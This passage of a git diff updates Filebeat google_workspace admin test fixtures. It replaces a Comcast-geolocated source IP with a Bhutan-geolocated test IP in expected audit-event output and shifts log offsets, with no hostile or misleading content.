- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -61,7 +57,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"89.160.20.156\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"89.160.20.156\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -70,35 +66,31 @@
 "google_workspace.actor.type": "USER",
 "google_workspace.admin.email.log_search_filter.end_date": "2020-07-28T04:59:59.000Z",
 "google_workspace.admin.email.log_search_filter.message_id": "id",
- "google_workspace.admin.email.log_search_filter.recipient.ip": "1.1.1.1",
+ "google_workspace.admin.email.log_search_filter.recipient.ip": "89.160.20.156",
 "google_workspace.admin.email.log_search_filter.recipient.value": "recipient",
- "google_workspace.admin.email.log_search_filter.sender.ip": "1.1.1.1",
+ "google_workspace.admin.email.log_search_filter.sender.ip": "89.160.20.156",
 "google_workspace.admin.email.log_search_filter.sender.value": "sender",
 "google_workspace.admin.email.log_search_filter.start_date": "2002-10-02T10:00:00.000Z",
 "google_workspace.event.type": "EMAIL_SETTINGS",
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 432,
+ "log.offset": 431,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -121,7 +113,7 @@
 "event.end": "2002-10-02T12:00:00.000Z",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
 "event.provider": "admin",
 "event.start": "2002-10-02T10:00:00.000Z",
 "event.type": [
@@ -134,27 +126,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 1188,
+ "log.offset": 1198,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -179,7 +167,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -198,26 +186,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 1671,
+ "log.offset": 1680,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -239,7 +223,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -254,26 +238,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2254,
+ "log.offset": 2262,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -295,7 +275,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -310,26 +290,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 2792,
+ "log.offset": 2799,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -351,7 +327,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -366,26 +342,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3330,
+ "log.offset": 3336,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -406,7 +378,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -419,26 +391,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 3868,
+ "log.offset": 3873,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -459,7 +427,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -472,26 +440,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 4302,
+ "log.offset": 4306,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log
index 2c60ded89cc1..2df4744cd6e4 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log
@@ -1,14 +1,14 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}}
